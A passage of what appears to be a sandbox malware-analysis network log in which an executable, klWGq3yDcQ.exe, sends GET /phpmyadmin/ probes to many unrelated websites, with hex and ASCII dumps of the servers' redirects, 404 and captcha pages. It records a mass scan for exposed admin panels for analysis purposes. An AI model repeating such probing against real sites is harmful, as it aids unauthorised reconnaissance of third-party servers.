                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65 74 20 65 3d 61 72 67 75
                                                                                                                                                                                                    Data Ascii: 3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){let e=argu
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74 65 78 74 3a 70 2c 62 75
                                                                                                                                                                                                    Data Ascii: gth;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,context:p,bu
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC1369INData Raw: 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e
                                                                                                                                                                                                    Data Ascii: ,get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&&argumen


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    53192.168.2.45516613.234.155.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC174OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: srmist.edu.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC230INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 0d 0a 53 65 72 76 65 72 3a 20 61 77 73 65 6c 62 2f 32 2e 30 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 35 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 61 6d 7a 6e 2d 77 61 66 2d 61 63 74 69 6f 6e 3a 20 63 61 70 74 63 68 61 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 405 Not AllowedServer: awselb/2.0Date: Sun, 26 Nov 2023 05:59:31 GMTContent-Length: 2051Connection: closex-amzn-waf-action: captchaCache-Control: no-store, max-age=0Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC2051INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 75 6d 61 6e 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 41 72 69 61 6c 22 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Human Verification</title> <style> body { font-family: "Arial"; } </


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    54192.168.2.455067164.52.221.514436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC171OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: gccb.co.in
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC214INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 3a 2f 2f 31 37 32 2e 31 36 2e 31 32 33 2e 37 36 3a 32 30 33 30 2f 70 6d 61 2f 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheLocation: http://172.16.123.76:2030/pma/Content-Length: 238Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC238INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 37 32 2e 31 36 2e 31 32 33 2e 37 36 3a 32 30 33 30 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://172.16.123.76:2030/pma/">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    55192.168.2.455442104.247.74.1074436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: vivanettv.co.ke
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC221INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 76 69 76 61 6e 65 74 74 76 2e 63 6f 2e 6b 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 33 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheLocation: https://vivanettv.co.ke/cgi-sys/suspendedpage.cgiContent-Length: 233Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC233INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 76 69 76 61 6e 65 74 74 76 2e 63 6f 2e 6b 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://vivanettv.co.ke/cgi-sys/suspendedpage.cgi">here</a>.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    56192.168.2.455508172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC528INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 65 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 63 6f 6e 74 65 6e 74 2d 74 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 6c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://samson.pe/wp-json/>; rel="https://api.
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC840INData Raw: 37 65 34 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 50 45 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54
                                                                                                                                                                                                    Data Ascii: 7e4e<!doctype html><html lang="es-PE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... T
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC14994INData Raw: 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 75 62 6c 69 73 68 65 72 22 3a 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 7d 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f 6e 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 53 65 61 72 63 68 41 63 74 69 6f 6e 22 2c 22 74 61 72 67 65 74 22 3a 7b 22 40 74 79 70 65 22 3a 22 45 6e 74 72 79 50 6f 69 6e 74 22 2c 22 75 72 6c 54 65 6d 70 6c 61 74 65 22 3a 22 68 74 74 70 73 3a 2f 2f 73 61 6d 73 6f 6e 2e 70 65 2f 3f 73 3d 7b 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 7d 22 7d 2c 22 71 75 65 72 79 2d 69 6e 70 75 74 22 3a 22 72 65 71 75 69 72 65 64 20 6e 61 6d 65 3d 73 65 61 72 63 68 5f 74 65 72 6d 5f 73 74 72 69 6e 67 22 7d 5d 2c 22 69 6e 4c 61
                                                                                                                                                                                                    Data Ascii: ription":"","publisher":{"@id":"https://samson.pe/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://samson.pe/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLa
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC16384INData Raw: 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6d 69 64 6e 69 67 68 74 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70
                                                                                                                                                                                                    Data Ascii: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--p
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC124INData Raw: 74 2f 70 6c 75 67 69 6e 73 2f 77 70 2d 73 6d 75 73 68 69 74 2f 61 70 70 2f 61 73 73 65 74 73 2f 6a 73 2f 73 6d 75 73 68 2d 6c 61 7a 79 2d 6c 6f 61 64 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 33 2e 31 35 2e 30 22 20 69 64 3d 22 73 6d 75 73 68 2d 6c 61 7a 79 2d 6c 6f 61 64 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: t/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js?ver=3.15.0" id="smush-lazy-load-js"></script></body></html>
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    57192.168.2.45571376.223.105.2304436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC176OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: saudi-jamac.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC288INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 39 36 34 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 65 72 76 65 72 3a 20 44 50 53 2f 32 2e 30 2e 30 2b 73 68 61 2d 33 32 31 30 62 34 39 0d 0a 58 2d 56 65 72 73 69 6f 6e 3a 20 33 32 31 30 62 34 39 0d 0a 58 2d 53 69 74 65 49 64 3a 20 75 73 2d 65 61 73 74 2d 31 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 64 70 73 5f 73 69 74 65 5f 69 64 3d 75 73 2d 65 61 73 74 2d 31 3b 20 70 61 74 68 3d 2f 3b 20 73 65 63 75 72 65 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundContent-Type: text/html;charset=utf-8Content-Length: 964Vary: Accept-EncodingServer: DPS/2.0.0+sha-3210b49X-Version: 3210b49X-SiteId: us-east-1Set-Cookie: dps_site_id=us-east-1; path=/; secureDate: Sun, 26 Nov 2023 05
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC964INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    58192.168.2.45551081.19.159.644436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: grg17geblergasse.at
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC374INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 31 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 52 65 64 69 72 65 63 74 2d 42 79 3a 20 57 6f 72 64 50 72 65 73 73 0d 0a 55 70 67 72 61 64 65 3a 20 68 32 2c 68 32 63 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 55 70 67 72 61 64 65 2c 20 63 6c 6f 73 65 0d 0a 4c 6f 63 61 74 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Redirect-By: WordPressUpgrade: h2,h2cConnection: Upgrade, closeLocati
                                                                                                                                                                                                    2023-11-26 05:59:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                    59192.168.2.455832192.124.249.13443
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:31 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: coimbrausa.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
